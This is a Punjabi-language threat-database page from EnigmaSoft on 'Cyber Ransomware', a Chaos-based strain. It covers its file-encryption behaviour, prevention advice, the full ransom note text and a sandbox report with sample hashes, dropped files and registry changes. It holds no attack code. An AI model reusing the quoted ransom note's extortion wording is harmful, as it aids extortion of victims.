Cyber Ransomware

ਰੈਨਸਮਵੇਅਰ ਵਿੱਚ Mezo ਦੁਆਰਾ

ਇਸ ਵਿੱਚ ਅਨੁਵਾਦ ਕਰੋ:

ਧਮਕੀ ਸਕੋਰ ਕਾਰਡ

EnigmaSoft ਧਮਕੀ ਸਕੋਰਕਾਰਡ

EnigmaSoft ਥ੍ਰੀਟ ਸਕੋਰਕਾਰਡ ਵੱਖ-ਵੱਖ ਮਾਲਵੇਅਰ ਖਤਰਿਆਂ ਲਈ ਮੁਲਾਂਕਣ ਰਿਪੋਰਟਾਂ ਹਨ ਜੋ ਸਾਡੀ ਖੋਜ ਟੀਮ ਦੁਆਰਾ ਇਕੱਤਰ ਅਤੇ ਵਿਸ਼ਲੇਸ਼ਣ ਕੀਤੀਆਂ ਗਈਆਂ ਹਨ। EnigmaSoft ਥ੍ਰੀਟ ਸਕੋਰਕਾਰਡ ਅਸਲ-ਸੰਸਾਰ ਅਤੇ ਸੰਭਾਵੀ ਜੋਖਮ ਕਾਰਕ, ਰੁਝਾਨ, ਬਾਰੰਬਾਰਤਾ, ਪ੍ਰਚਲਨ, ਅਤੇ ਨਿਰੰਤਰਤਾ ਸਮੇਤ ਕਈ ਮੈਟ੍ਰਿਕਸ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹੋਏ ਖਤਰਿਆਂ ਦਾ ਮੁਲਾਂਕਣ ਅਤੇ ਦਰਜਾਬੰਦੀ ਕਰਦੇ ਹਨ। EnigmaSoft ਥ੍ਰੀਟ ਸਕੋਰਕਾਰਡ ਸਾਡੇ ਖੋਜ ਡੇਟਾ ਅਤੇ ਮੈਟ੍ਰਿਕਸ ਦੇ ਆਧਾਰ 'ਤੇ ਨਿਯਮਿਤ ਤੌਰ 'ਤੇ ਅੱਪਡੇਟ ਕੀਤੇ ਜਾਂਦੇ ਹਨ ਅਤੇ ਕੰਪਿਊਟਰ ਉਪਭੋਗਤਾਵਾਂ ਦੀ ਇੱਕ ਵਿਸ਼ਾਲ ਸ਼੍ਰੇਣੀ ਲਈ ਲਾਭਦਾਇਕ ਹੁੰਦੇ ਹਨ, ਆਪਣੇ ਸਿਸਟਮਾਂ ਤੋਂ ਮਾਲਵੇਅਰ ਨੂੰ ਹਟਾਉਣ ਲਈ ਹੱਲ ਲੱਭਣ ਵਾਲੇ ਅੰਤਮ ਉਪਭੋਗਤਾਵਾਂ ਤੋਂ ਲੈ ਕੇ ਧਮਕੀਆਂ ਦਾ ਵਿਸ਼ਲੇਸ਼ਣ ਕਰਨ ਵਾਲੇ ਸੁਰੱਖਿਆ ਮਾਹਰਾਂ ਤੱਕ।

EnigmaSoft ਥ੍ਰੀਟ ਸਕੋਰਕਾਰਡਸ ਕਈ ਤਰ੍ਹਾਂ ਦੀ ਉਪਯੋਗੀ ਜਾਣਕਾਰੀ ਪ੍ਰਦਰਸ਼ਿਤ ਕਰਦੇ ਹਨ, ਜਿਸ ਵਿੱਚ ਸ਼ਾਮਲ ਹਨ:

Popularity Rank: The ranking of a particular threat in EnigmaSoft’s Threat Database.

ਗੰਭੀਰਤਾ ਦਾ ਪੱਧਰ: ਕਿਸੇ ਵਸਤੂ ਦਾ ਨਿਰਧਾਰਿਤ ਗੰਭੀਰਤਾ ਪੱਧਰ, ਜੋ ਕਿ ਸਾਡੇ ਖਤਰੇ ਦੇ ਮੁਲਾਂਕਣ ਮਾਪਦੰਡ ਵਿੱਚ ਸਮਝਾਇਆ ਗਿਆ ਹੈ, ਸਾਡੀ ਜੋਖਮ ਮਾਡਲਿੰਗ ਪ੍ਰਕਿਰਿਆ ਅਤੇ ਖੋਜ ਦੇ ਆਧਾਰ 'ਤੇ ਸੰਖਿਆਤਮਕ ਤੌਰ 'ਤੇ ਪ੍ਰਸਤੁਤ ਕੀਤਾ ਗਿਆ ਹੈ।

ਸੰਕਰਮਿਤ ਕੰਪਿਊਟਰ: ਸਪਾਈਹੰਟਰ ਦੁਆਰਾ ਰਿਪੋਰਟ ਕੀਤੇ ਅਨੁਸਾਰ ਸੰਕਰਮਿਤ ਕੰਪਿਊਟਰਾਂ 'ਤੇ ਖੋਜੇ ਗਏ ਕਿਸੇ ਖਾਸ ਖਤਰੇ ਦੇ ਪੁਸ਼ਟੀ ਕੀਤੇ ਅਤੇ ਸ਼ੱਕੀ ਮਾਮਲਿਆਂ ਦੀ ਗਿਣਤੀ।

ਧਮਕੀ ਮੁਲਾਂਕਣ ਮਾਪਦੰਡ ਵੀ ਦੇਖੋ।

Popularity Rank:	10,078
ਖਤਰੇ ਦਾ ਪੱਧਰ:	100 % (ਉੱਚ)
ਸੰਕਰਮਿਤ ਕੰਪਿਊਟਰ:	3,489

ਪਹਿਲੀ ਵਾਰ ਦੇਖਿਆ:	October 15, 2021
ਅਖੀਰ ਦੇਖਿਆ ਗਿਆ:	November 12, 2025
ਪ੍ਰਭਾਵਿਤ OS:	Windows

ਸਾਈਬਰ ਨਾਮਕ ਖਤਰਨਾਕ ਪ੍ਰੋਗਰਾਮ ਰੈਨਸਮਵੇਅਰ ਕਿਸਮ ਦਾ ਮਾਲਵੇਅਰ ਹੈ। ਉਲੰਘਣਾ ਕੀਤੇ ਸਿਸਟਮ 'ਤੇ ਲਾਗੂ ਕੀਤੇ ਜਾਣ 'ਤੇ, ਇਹ ਤੁਰੰਤ ਡਿਵਾਈਸ 'ਤੇ ਸਾਰੀਆਂ ਫਾਈਲਾਂ ਲਈ ਇੱਕ ਏਨਕ੍ਰਿਪਸ਼ਨ ਪ੍ਰਕਿਰਿਆ ਸ਼ੁਰੂ ਕਰਦਾ ਹੈ ਅਤੇ ਉਹਨਾਂ ਦੇ ਅਸਲ ਫਾਈਲਨਾਮਾਂ ਨੂੰ '.Cyber' ਐਕਸਟੈਂਸ਼ਨ ਨਾਲ ਜੋੜਦਾ ਹੈ। ਉਦਾਹਰਨ ਲਈ, '1.doc' ਦੇ ਸ਼ੁਰੂਆਤੀ ਨਾਮ ਵਾਲੀ ਇੱਕ ਫਾਈਲ ਹੁਣ ਐਨਕ੍ਰਿਪਟ ਕੀਤੇ ਜਾਣ ਤੋਂ ਬਾਅਦ '1.doc.Cyber' ਦੇ ਰੂਪ ਵਿੱਚ ਦਿਖਾਈ ਦੇਵੇਗੀ। ਇਸੇ ਤਰ੍ਹਾਂ, '2.pdf' '2.pdf.Cyber' ਬਣ ਜਾਵੇਗਾ, ਅਤੇ ਇਸ ਤਰ੍ਹਾਂ ਹੋਰ। ਸਾਈਬਰ ਸੁਰੱਖਿਆ ਖੋਜਕਰਤਾਵਾਂ ਨੇ ਦੱਸਿਆ ਕਿ ਸਾਈਬਰ ਰੈਨਸਮਵੇਅਰ ਦਾ ਖ਼ਤਰਾ ਕੈਓਸ ਮਾਲਵੇਅਰ ਤਣਾਅ 'ਤੇ ਅਧਾਰਤ ਹੈ।

ਫਾਈਲ ਐਨਕ੍ਰਿਪਸ਼ਨ ਤੋਂ ਇਲਾਵਾ, ਸਾਈਬਰ ਰੈਨਸਮਵੇਅਰ ਡੈਸਕਟੌਪ ਵਾਲਪੇਪਰ ਨੂੰ ਵੀ ਬਦਲਦਾ ਹੈ ਅਤੇ 'read_it.txt' ਨਾਮਕ ਇੱਕ ਰਿਹਾਈ-ਸਮੂਹ ਨੋਟ ਤਿਆਰ ਕਰਦਾ ਹੈ। ਫਿਰੌਤੀ ਨੋਟ ਵਿੱਚ ਪੀੜਤਾਂ ਲਈ ਨਿਰਦੇਸ਼ ਸ਼ਾਮਲ ਹਨ, ਰੈਨਸਮਵੇਅਰ ਹਮਲਿਆਂ ਲਈ ਜ਼ਿੰਮੇਵਾਰ ਸਾਈਬਰ ਅਪਰਾਧੀ ਆਮ ਤੌਰ 'ਤੇ ਐਨਕ੍ਰਿਪਟਡ ਫਾਈਲਾਂ ਨੂੰ ਅਨਲੌਕ ਕਰਨ ਲਈ ਡੀਕ੍ਰਿਪਸ਼ਨ ਕੁੰਜੀ ਦੇ ਬਦਲੇ ਭੁਗਤਾਨ ਦੀ ਮੰਗ ਕਰਦੇ ਹਨ।

ਵਿਸ਼ਾ - ਸੂਚੀ

Cyber Ransomware ਐਨਕ੍ਰਿਪਸ਼ਨ ਦੁਆਰਾ ਬਹੁਤ ਸਾਰੀਆਂ ਫਾਈਲ ਕਿਸਮਾਂ ਨੂੰ ਪਹੁੰਚਯੋਗ ਨਹੀਂ ਬਣਾ ਸਕਦਾ ਹੈ

ਰੈਨਸਮਵੇਅਰ ਨੋਟ ਦਰਸਾਉਂਦਾ ਹੈ ਕਿ ਪੀੜਤ ਦੀਆਂ ਮਹੱਤਵਪੂਰਨ ਫਾਈਲਾਂ, ਜਿਵੇਂ ਕਿ ਡੇਟਾਬੇਸ, ਦਸਤਾਵੇਜ਼ ਅਤੇ ਫੋਟੋਆਂ, ਨੂੰ ਐਨਕ੍ਰਿਪਟ ਕੀਤਾ ਗਿਆ ਹੈ ਅਤੇ ਬਿਟਕੋਇਨ ਕ੍ਰਿਪਟੋਕੁਰੰਸੀ ਵਿੱਚ ਫਿਰੌਤੀ ਦਾ ਭੁਗਤਾਨ ਕਰਕੇ ਹੀ ਡੀਕ੍ਰਿਪਟ ਕੀਤਾ ਜਾ ਸਕਦਾ ਹੈ। ਰਿਹਾਈ ਦੀ ਰਕਮ ਦਾ ਆਮ ਤੌਰ 'ਤੇ ਜ਼ਿਕਰ ਕੀਤਾ ਜਾਂਦਾ ਹੈ, ਅਤੇ ਪੀੜਤਾਂ ਨੂੰ ਭੁਗਤਾਨ ਕਰਨ ਤੋਂ ਪਹਿਲਾਂ ਸੀਮਤ ਗਿਣਤੀ ਦੀਆਂ ਫਾਈਲਾਂ 'ਤੇ ਡੀਕ੍ਰਿਪਸ਼ਨ ਦੀ ਜਾਂਚ ਕਰਨ ਦਾ ਤਰੀਕਾ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ।

ਨੋਟ ਵਿੱਚ ਅਕਸਰ ਹਮਲਾਵਰਾਂ ਜਾਂ ਉਹਨਾਂ ਦੇ ਪ੍ਰਤੀਨਿਧੀਆਂ ਲਈ ਸੰਪਰਕ ਜਾਣਕਾਰੀ ਹੁੰਦੀ ਹੈ। ਹਾਲਾਂਕਿ, ਕਈ ਵਾਰ ਸੰਪਰਕ ਜਾਣਕਾਰੀ ਵੈਧ ਨਹੀਂ ਹੋ ਸਕਦੀ ਹੈ, ਅਤੇ ਪੀੜਤ ਨੂੰ ਹਮਲਾਵਰਾਂ ਨਾਲ ਸੰਚਾਰ ਕਰਨ ਵਿੱਚ ਮੁਸ਼ਕਲ ਹੋ ਸਕਦੀ ਹੈ। ਇਸ ਤੋਂ ਇਲਾਵਾ, ਰੈਨਸਮਵੇਅਰ ਦਾ ਵਾਲਪੇਪਰ ਇੱਕੋ ਸੰਦੇਸ਼ ਅਤੇ ਰਿਹਾਈ ਦੀ ਰਕਮ ਨੂੰ ਪ੍ਰਦਰਸ਼ਿਤ ਕਰ ਸਕਦਾ ਹੈ ਪਰ ਵੱਖ-ਵੱਖ ਸੰਪਰਕ ਵੇਰਵਿਆਂ ਨਾਲ।

ਜ਼ਿਆਦਾਤਰ ਰੈਨਸਮਵੇਅਰ ਹਮਲਿਆਂ ਵਿੱਚ, ਹਮਲਾਵਰਾਂ ਦੀ ਸ਼ਮੂਲੀਅਤ ਤੋਂ ਬਿਨਾਂ ਡੀਕ੍ਰਿਪਸ਼ਨ ਆਮ ਤੌਰ 'ਤੇ ਸੰਭਵ ਨਹੀਂ ਹੈ। ਇੱਥੋਂ ਤੱਕ ਕਿ ਜਦੋਂ ਪੀੜਤ ਫਿਰੌਤੀ ਦਾ ਭੁਗਤਾਨ ਕਰਦੇ ਹਨ, ਉਹਨਾਂ ਨੂੰ ਉਹਨਾਂ ਦੀਆਂ ਫਾਈਲਾਂ ਨੂੰ ਮੁੜ ਪ੍ਰਾਪਤ ਕਰਨ ਲਈ ਲੋੜੀਂਦੀਆਂ ਡੀਕ੍ਰਿਪਸ਼ਨ ਕੁੰਜੀਆਂ ਜਾਂ ਸੌਫਟਵੇਅਰ ਪ੍ਰਾਪਤ ਨਹੀਂ ਹੋ ਸਕਦੇ ਹਨ। ਨਤੀਜੇ ਵਜੋਂ, ਮਾਹਰ ਫਿਰੌਤੀ ਦਾ ਭੁਗਤਾਨ ਕਰਨ ਦੇ ਵਿਰੁੱਧ ਜ਼ੋਰਦਾਰ ਸਲਾਹ ਦਿੰਦੇ ਹਨ, ਭਾਵੇਂ ਸੰਪਰਕ ਜਾਣਕਾਰੀ ਜਾਇਜ਼ ਹੋਵੇ ਅਤੇ ਫਿਰੌਤੀ ਦੀ ਰਕਮ ਕਿਫਾਇਤੀ ਜਾਪਦੀ ਹੋਵੇ।

ਇਹ ਯਾਦ ਰੱਖਣਾ ਜ਼ਰੂਰੀ ਹੈ ਕਿ ਫਿਰੌਤੀ ਦਾ ਭੁਗਤਾਨ ਕਰਨਾ ਅਪਰਾਧਿਕ ਗਤੀਵਿਧੀ ਦਾ ਸਮਰਥਨ ਕਰਦਾ ਹੈ ਅਤੇ ਐਨਕ੍ਰਿਪਟਡ ਡੇਟਾ ਦੀ ਰਿਕਵਰੀ ਦੀ ਗਰੰਟੀ ਨਹੀਂ ਦਿੰਦਾ ਹੈ। ਪੀੜਤਾਂ ਨੂੰ ਹੋਰ ਵਿਕਲਪਾਂ ਦੀ ਪੜਚੋਲ ਕਰਨੀ ਚਾਹੀਦੀ ਹੈ, ਜਿਵੇਂ ਕਿ ਬੈਕਅੱਪ ਤੋਂ ਫਾਈਲਾਂ ਨੂੰ ਬਹਾਲ ਕਰਨਾ ਜਾਂ ਸੁਰੱਖਿਆ ਮਾਹਰਾਂ ਤੋਂ ਸਹਾਇਤਾ ਮੰਗਣਾ।

Cyber Ransomware ਵਰਗੇ ਖ਼ਤਰਿਆਂ ਤੋਂ ਆਪਣੇ ਡਿਵਾਈਸਾਂ ਅਤੇ ਡੇਟਾ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰਨਾ ਯਕੀਨੀ ਬਣਾਓ

ਸਭ ਤੋਂ ਵਧੀਆ ਉਪਾਅ ਜੋ ਉਪਭੋਗਤਾ ਆਪਣੇ ਡਿਵਾਈਸਾਂ ਅਤੇ ਡੇਟਾ ਨੂੰ ਰੈਨਸਮਵੇਅਰ ਹਮਲਿਆਂ ਤੋਂ ਬਚਾਉਣ ਲਈ ਲਾਗੂ ਕਰ ਸਕਦੇ ਹਨ ਉਹਨਾਂ ਵਿੱਚ ਕਿਰਿਆਸ਼ੀਲ ਅਤੇ ਪ੍ਰਤੀਕਿਰਿਆਸ਼ੀਲ ਰਣਨੀਤੀਆਂ ਦਾ ਸੁਮੇਲ ਸ਼ਾਮਲ ਹੈ।

ਪਹਿਲਾਂ, ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਆਪਣੀ ਔਨਲਾਈਨ ਗਤੀਵਿਧੀ ਵਿੱਚ ਚੌਕਸ ਰਹਿਣਾ ਚਾਹੀਦਾ ਹੈ ਅਤੇ ਆਮ ਰੈਨਸਮਵੇਅਰ ਇਨਫੈਕਸ਼ਨ ਵੈਕਟਰਾਂ, ਜਿਵੇਂ ਕਿ ਫਿਸ਼ਿੰਗ ਈਮੇਲਾਂ ਜਾਂ ਖਤਰਨਾਕ ਡਾਊਨਲੋਡਾਂ ਦੇ ਸ਼ਿਕਾਰ ਹੋਣ ਤੋਂ ਬਚਣ ਲਈ ਕਦਮ ਚੁੱਕਣੇ ਚਾਹੀਦੇ ਹਨ। ਇਸ ਵਿੱਚ ਮਜ਼ਬੂਤ ਅਤੇ ਵਿਲੱਖਣ ਪਾਸਵਰਡ ਦੀ ਵਰਤੋਂ ਕਰਨਾ, ਸਾਫ਼ਟਵੇਅਰ ਅਤੇ ਓਪਰੇਟਿੰਗ ਸਿਸਟਮ ਨੂੰ ਨਿਯਮਿਤ ਤੌਰ 'ਤੇ ਅੱਪਡੇਟ ਕਰਨਾ, ਅਤੇ ਸ਼ੱਕੀ ਈਮੇਲਾਂ ਜਾਂ ਲਿੰਕਾਂ ਤੋਂ ਸਾਵਧਾਨ ਰਹਿਣਾ ਸ਼ਾਮਲ ਹੈ।

ਦੂਜਾ, ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਸੁਰੱਖਿਆ ਉਪਾਵਾਂ ਨੂੰ ਲਾਗੂ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ, ਜਿਵੇਂ ਕਿ ਪ੍ਰਤਿਸ਼ਠਾਵਾਨ ਐਂਟੀ-ਮਾਲਵੇਅਰ ਸੌਫਟਵੇਅਰ ਦੀ ਵਰਤੋਂ ਕਰਨਾ ਅਤੇ ਉਹਨਾਂ ਦੇ ਡਿਵਾਈਸਾਂ ਤੱਕ ਅਣਅਧਿਕਾਰਤ ਪਹੁੰਚ ਨੂੰ ਰੋਕਣ ਲਈ ਫਾਇਰਵਾਲ ਨੂੰ ਸਮਰੱਥ ਕਰਨਾ। ਉਹਨਾਂ ਨੂੰ ਐਂਡਪੁਆਇੰਟ ਡਿਟੈਕਸ਼ਨ ਐਂਡ ਰਿਸਪਾਂਸ (EDR) ਟੂਲਸ ਦੀ ਵਰਤੋਂ ਕਰਨ 'ਤੇ ਵੀ ਵਿਚਾਰ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ, ਜੋ ਅਸਲ ਸਮੇਂ ਵਿੱਚ ਰੈਨਸਮਵੇਅਰ ਹਮਲਿਆਂ ਦਾ ਪਤਾ ਲਗਾਉਣ ਅਤੇ ਜਵਾਬ ਦੇਣ ਵਿੱਚ ਮਦਦ ਕਰ ਸਕਦੇ ਹਨ।

ਤੀਜਾ, ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਨਿਯਮਿਤ ਤੌਰ 'ਤੇ ਆਪਣੇ ਮਹੱਤਵਪੂਰਨ ਡੇਟਾ ਨੂੰ ਬਾਹਰੀ ਸਰੋਤ, ਜਿਵੇਂ ਕਿ ਕਲਾਉਡ ਸੇਵਾ ਜਾਂ ਇੱਕ ਬਾਹਰੀ ਹਾਰਡ ਡਰਾਈਵ ਵਿੱਚ ਬੈਕਅੱਪ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ। ਇਹ ਯਕੀਨੀ ਬਣਾਉਣ ਵਿੱਚ ਮਦਦ ਕਰ ਸਕਦਾ ਹੈ ਕਿ ਭਾਵੇਂ ਉਨ੍ਹਾਂ ਦੀ ਡਿਵਾਈਸ ਰੈਨਸਮਵੇਅਰ ਨਾਲ ਸੰਕਰਮਿਤ ਹੈ, ਫਿਰ ਵੀ ਉਹ ਫਿਰੌਤੀ ਦਾ ਭੁਗਤਾਨ ਕੀਤੇ ਬਿਨਾਂ ਆਪਣੇ ਡੇਟਾ ਤੱਕ ਪਹੁੰਚ ਕਰ ਸਕਦੇ ਹਨ।

ਚੌਥਾ, ਇੱਕ ਰੈਨਸਮਵੇਅਰ ਹਮਲੇ ਦੀ ਸਥਿਤੀ ਵਿੱਚ, ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਫਿਰੌਤੀ ਦਾ ਭੁਗਤਾਨ ਕਰਨ ਤੋਂ ਬਚਣਾ ਚਾਹੀਦਾ ਹੈ ਕਿਉਂਕਿ ਇਹ ਉਹਨਾਂ ਦੇ ਡੇਟਾ ਦੀ ਸੁਰੱਖਿਅਤ ਰਿਕਵਰੀ ਦੀ ਗਰੰਟੀ ਨਹੀਂ ਦੇ ਸਕਦਾ ਹੈ ਅਤੇ ਹੋਰ ਅਪਰਾਧਿਕ ਗਤੀਵਿਧੀਆਂ ਨੂੰ ਵੀ ਉਤਸ਼ਾਹਿਤ ਕਰ ਸਕਦਾ ਹੈ। ਇਸ ਦੀ ਬਜਾਏ, ਉਹਨਾਂ ਨੂੰ ਸੁਰੱਖਿਆ ਮਾਹਰਾਂ ਤੋਂ ਪੇਸ਼ੇਵਰ ਮਦਦ ਲੈਣੀ ਚਾਹੀਦੀ ਹੈ ਅਤੇ ਕਾਨੂੰਨ ਲਾਗੂ ਕਰਨ ਵਾਲੇ ਅਧਿਕਾਰੀਆਂ ਨੂੰ ਹਮਲੇ ਦੀ ਰਿਪੋਰਟ ਕਰਨ ਬਾਰੇ ਵਿਚਾਰ ਕਰਨਾ ਚਾਹੀਦਾ ਹੈ।

ਅੰਤ ਵਿੱਚ, ਉਪਭੋਗਤਾਵਾਂ ਨੂੰ ਸੰਭਾਵੀ ਹਮਲਿਆਂ ਤੋਂ ਸੁਚੇਤ ਰਹਿਣ ਅਤੇ ਆਪਣੇ ਆਪ ਨੂੰ ਬਚਾਉਣ ਲਈ ਤਿਆਰ ਰਹਿਣ ਲਈ ਨਵੀਨਤਮ ਰੈਨਸਮਵੇਅਰ ਖਤਰਿਆਂ ਅਤੇ ਵਿਕਸਤ ਹਮਲੇ ਦੀਆਂ ਤਕਨੀਕਾਂ ਬਾਰੇ ਸੂਚਿਤ ਰਹਿਣਾ ਚਾਹੀਦਾ ਹੈ।

Cyber Ransomware ਦੁਆਰਾ ਛੱਡੇ ਗਏ ਫਿਰੌਤੀ ਨੋਟ ਦਾ ਪੂਰਾ ਪਾਠ ਇਹ ਹੈ:

ਚਿੰਤਾ ਨਾ ਕਰੋ, ਤੁਸੀਂ ਆਪਣੀਆਂ ਸਾਰੀਆਂ ਫਾਈਲਾਂ ਵਾਪਸ ਕਰ ਸਕਦੇ ਹੋ!

ਤੁਹਾਡੀਆਂ ਸਾਰੀਆਂ ਫਾਈਲਾਂ ਜਿਵੇਂ ਕਿ ਦਸਤਾਵੇਜ਼, ਫੋਟੋਆਂ, ਡੇਟਾਬੇਸ ਅਤੇ ਹੋਰ ਮਹੱਤਵਪੂਰਨ ਇਨਕ੍ਰਿਪਟਡ ਹਨ

ਅਸੀਂ ਤੁਹਾਨੂੰ ਕੀ ਗਾਰੰਟੀ ਦਿੰਦੇ ਹਾਂ?

ਤੁਸੀਂ ਆਪਣੀਆਂ ਇਨਕ੍ਰਿਪਟਡ ਫ਼ਾਈਲਾਂ ਵਿੱਚੋਂ 3 ਭੇਜ ਸਕਦੇ ਹੋ ਅਤੇ ਅਸੀਂ ਇਸਨੂੰ ਮੁਫ਼ਤ ਵਿੱਚ ਡੀਕ੍ਰਿਪਟ ਕਰਦੇ ਹਾਂ।

ਆਪਣੀਆਂ ਫਾਈਲਾਂ ਨੂੰ ਡੀਕ੍ਰਿਪਟ ਕਰਨ ਲਈ ਤੁਹਾਨੂੰ ਇਹਨਾਂ ਕਦਮਾਂ ਦੀ ਪਾਲਣਾ ਕਰਨੀ ਚਾਹੀਦੀ ਹੈ:

1) ਸਾਡੇ ਈ-ਮੇਲ 'ਤੇ ਲਿਖੋ:test@test.com ( 24 ਘੰਟਿਆਂ ਵਿੱਚ ਜਵਾਬ ਨਾ ਮਿਲਣ ਦੀ ਸੂਰਤ ਵਿੱਚ ਆਪਣੇ ਸਪੈਮ ਫੋਲਡਰ ਦੀ ਜਾਂਚ ਕਰੋ

ਜਾਂ ਸਾਨੂੰ ਇਸ ਈ-ਮੇਲ 'ਤੇ ਲਿਖੋ: test2@test.com)

2) ਬਿਟਕੋਇਨ ਪ੍ਰਾਪਤ ਕਰੋ (ਤੁਹਾਨੂੰ ਬਿਟਕੋਇਨਾਂ ਵਿੱਚ ਡੀਕ੍ਰਿਪਸ਼ਨ ਲਈ ਭੁਗਤਾਨ ਕਰਨਾ ਪਵੇਗਾ।

ਭੁਗਤਾਨ ਤੋਂ ਬਾਅਦ ਅਸੀਂ ਤੁਹਾਨੂੰ ਉਹ ਟੂਲ ਭੇਜਾਂਗੇ ਜੋ ਤੁਹਾਡੀਆਂ ਸਾਰੀਆਂ ਫਾਈਲਾਂ ਨੂੰ ਡੀਕ੍ਰਿਪਟ ਕਰੇਗਾ।)

Cyber Ransomware ਵੀਡੀਓ

ਸੁਝਾਅ: ਆਪਣੀ ਆਵਾਜ਼ ਨੂੰ ਚਾਲੂ ਕਰੋ ਅਤੇ ਪੂਰੀ ਸਕ੍ਰੀਨ ਮੋਡ ਵਿੱਚ ਵੀਡੀਓ ਦੇਖੋ ।

ਵਿਸ਼ਲੇਸ਼ਣ ਰਿਪੋਰਟ

ਆਮ ਜਾਣਕਾਰੀ

Family Name:	Cyber Ransomware
Signature status:	No Signature

Known Samples

MD5: 6ae50bdc7246401c666cd7e1b200d87a

SHA1: ec759c5df1845d1109fe2518380233ae1854850f

ਫਾਈਲ ਦਾ ਆਕਾਰ: 1.84 MB, 1839616 bytes

MD5: 92a4a3aa4b40e95e8ca1d015c048246b

SHA1: 443a688cc83423c7511d56b626f85a392e798ac1

ਫਾਈਲ ਦਾ ਆਕਾਰ: 5.12 KB, 5120 bytes

MD5: 969c9e50187024581e8943a2d8ed9d2d

SHA1: 57cec27d4e6c7714265cad52f7fd9cf58f68bb82

SHA256: C78A44442518C4EC39EF4E85C331C5CDD25C92FC92A80010C6F6DC3F59B1C42D

ਫਾਈਲ ਦਾ ਆਕਾਰ: 4.61 KB, 4608 bytes

MD5: d1657a06fd2a757c43372f77ed433f30

SHA1: 48d0f17e206fdcff74121783989c90117ee411f4

SHA256: 0AFC88FC7DD731CF7D5884C415D5A27DC4FB39EB54DC890257AFEA947FC05725

ਫਾਈਲ ਦਾ ਆਕਾਰ: 4.54 MB, 4536320 bytes

Windows Portable Executable Attributes

File doesn't have "Rich" header
File doesn't have debug information
File doesn't have exports table
File doesn't have relocations information
File doesn't have security information
File is 32-bit executable
File is either console or GUI application
File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
File is Native application (NOT .NET application)
File is not packed

IMAGE_FILE_DLL is not set inside PE header (Executable)
IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

File Traits

HighEntropy
No Version Info
x86

Block Information

Total Blocks:	8
Potentially Malicious Blocks:	7
Whitelisted Blocks:	1
Unknown Blocks:	0

Visual Map

x x x x x x x 0

0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

ClipBanker.VA
ClipBanker.VB

Files Modified

File	Attributes
\device\namedpipe\pshost.133968239486036860.2548.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.133973844142271624.5256.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
\device\namedpipe\pshost.134074942406200962.1348.defaultappdomain.powershell	Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\cheat.dll	Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\launcher.ini	Generic Write,Read Attributes
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_16.db	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\explorer\iconcache_idx.db	Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_0zdqbhap.r32.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_24snuqhq.oyp.ps1	Generic Write,Read Attributes

c:\users\user\appdata\local\temp\__psscriptpolicytest_al3g5ul4.lob.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_aocz5vmr.rla.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_dv4pkhv1.qlu.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_iqv5olmb.tfb.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ruwcjycv.ppp.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_ux1vmtfo.12w.psm1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\album_td_3-8-0_activation.exe	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\father.bat	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.bat	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1	Generic Write,Read Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\modular.ps1	Synchronize,Write Attributes
c:\users\user\appdata\local\temp\ixp000.tmp\tmp4351$.tmp	Generic Write,Read Attributes,Delete
c:\users\user\appdata\local\temp\ttrj.exe	Generic Write,Read Attributes
c:\users\user\deployment_test.exe	Generic Write,Read Attributes

Registry Modifications

Key::Value	ਡਾਟਾ	API Name
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::proxybypass		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::intranetname		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::uncasintranet		RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\internet settings\zonemap::autodetect		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	넜泝Ǜ	RegNtPreCreateKey
